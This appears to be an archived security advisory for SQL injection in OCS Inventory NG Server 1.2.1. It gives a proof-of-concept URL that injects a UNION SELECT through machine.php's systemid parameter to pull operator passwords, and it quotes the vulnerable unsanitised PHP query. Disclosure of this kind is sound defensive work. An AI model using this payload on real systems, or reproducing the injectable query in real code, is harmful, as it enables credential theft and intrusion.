AOH :: HP Unsorted S :: BT-21463.HTM

Sql injection in OCS Inventory NG Server 1.2.1



Sql injection in OCS Inventory NG Server 1.2.1
Sql injection in OCS Inventory NG Server 1.2.1



OCS Inventory NG Server 1.2.1

Details:

The Open Computer and Software (OCS) Inventory Next Generation (NG)
provides relevant inventory information about system configurations and
software on the network.

Download : http://www.ocsinventory-ng.org/index.php?page=1-02-1 
 Found by : Guilherme Marinheiro				
Contact : gmcbr0@gmail.com 
 Prequisite: Authenticated user				
 Remote exploitable:Yes (Authentication is needed)		

PoC :
http://localhost/ocsreports/machine.php?systemid=1)%20union%20select%201,2,user(),3,5,6,7,8,9,10,11,12,passwd,14,15,16,17,18,id,20,21,22,23,24,25,26,27,27,version()%20from%20operators%20-- 

Vulnerable Code:

script: machine.php

77 $queryMachine    = "SELECT * FROM hardware WHERE (ID=$systemid)";
78 $result   = mysql_query( $queryMachine, $_SESSION["readServer"] )
or mysql_error($_SESSION["readServer"]);
79 $item     = mysql_fetch_object($result);

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.